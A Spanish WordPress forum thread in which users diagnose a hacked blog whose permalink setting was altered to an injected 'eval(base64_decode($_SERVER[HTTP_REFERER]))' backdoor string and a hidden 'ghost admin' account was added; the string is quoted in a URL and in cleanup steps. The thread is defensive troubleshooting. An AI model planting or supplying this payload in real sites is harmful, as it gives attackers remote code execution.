Permalinks cambiados (eval(base64_decode($_SERVER[}) – Admin fantasma

Inicio Foros WordPress General WordPress.org Permalinks cambiados (eval(base64_decode($_SERVER[}) – Admin fantasma

Etiquetado: 

Este debate contiene 10 respuestas, tiene 6 mensajes y lo actualizó  gseoane hace 8 años, 5 meses.

  • Autor
    Publicaciones
  • #14164

    cucoalmeria
    Participante

    <p>Hola a todos, no se porque, me he dado cuenta que cuando quiero comentar en algun post de mi blog o pincho para ver solo el post me dice esto:</p>
    <p>Bad Request</p>
    <p>Your browser sent a request that this server could not understand.<br />
    Apache/2.2.3 (CentOS) Server at cucoalmeria.net Port 80</p>
    <p>Por favor alguien sabe que significa y que puedo hacer ? No me habia pasado nunca. </p>
    <p>Saludos y gracias.<br />
    http://www.cucoalmeria.net
    </p>

  • #31604

    23r9i0
    Participante

    Hola cuco!!
    Te has fijado que en el enlace de una entrada acaba en base64…
    [code]http://cucoalmeria.net/2009/09/02/ver-television-gratis-con-mozila-firefox/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/[/code] cosa que no deberia ser asi, repasa los permanlinks de las opciones y comprueba que tu blog no tiene instalado alguna cosa rara.
    Yo personalmente no te puedo decir de donde a salido ese enlace pero el problema es ese.
    Saludos

  • #31606

    cucoalmeria
    Participante

    Es cierto, pero eso antes no salia Sergio. Eres un maquina, muchas gracias, se han cambido los permalinks, pero solos ?. Es increible.

  • #31608

    23r9i0
    Participante

    Hola
    sigue este enlace que le pasa lo mismo:
    [url=http://ayudawp.com/foro/topic/permalink-modificado-%C2%BFpro-arte-de-magia]http://ayudawp.com/foro/topic/permalink-modificado-%C2%BFpro-arte-de-magia[/url]

    Por cierto mirate plugin’s y theme buscando algo raro por si esta por hay el problema y luego pasate por la BD para comprobar lo mismo aunque este ultimo lugar es mas complicado.
    Saludos!!

  • #31609

    cucoalmeria
    Participante

    Mil gracias maestro.

  • #31611

    imported_Fernando
    Participante

    He estado buscando y es una inyección mysql: http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

    Sigue las instrucciones que dan en ese artículo para eliminar el administrador fantasma.

  • #31613

    imported_Fernando
    Participante

    Parece que esto ya no pasa con WP 2.8.4

  • #31614

    imported_Fernando
    Participante
  • #31913

    apegao
    Participante

    He vuelto después de las vacaciones y todo funciona bien. Maravilloso.
    ¡¡¡¡¡Los permalinks funcionan!!!!!
    Aún así he seguido las intrucciones de Fernando y he encontrado el administrador fantasma; el cual he borrado
    Al llegar a la siguiente tarea a realizar:

    página de configuración de Enlaces permanentes. Los cambias de …

    1./%year%/%monthnum%/%day%/%postname%/%eval(base64_decode($_SERVER[HTTP_REFERER]

    a

    1./%postname%/

    No termino de encontrar donde, en el tablero de WordPress no lo encuentro y en el editor de archivos del tema,tampoco. Estoy utilizando la versión 7.2.1, no se si estará en otro lugar

    ¿donde andará? perdonar mi ignorancia.

    Pd Gracias trabajo por tú interés en resolver el probleam

  • #31916

    imported_Eiwazh
    Participante

    Hola apegao:

    Mira para modificar los permalinks, tienes que ir a tu Dashboard –> Opciones –> Enlaces Permanentes, yo tengo WP en español pero en ingles sería Dashboard –> Options –> Permalinks

  • #43342

    gseoane
    Participante

    yo en wordpress 3.0 me desaparecio los enlaces permanentes , alguien sabe porque ?

El foro ‘General WordPress.org’ está cerrado y no se permiten nuevos debates ni respuestas.

Pin It on Pinterest

Ir al contenido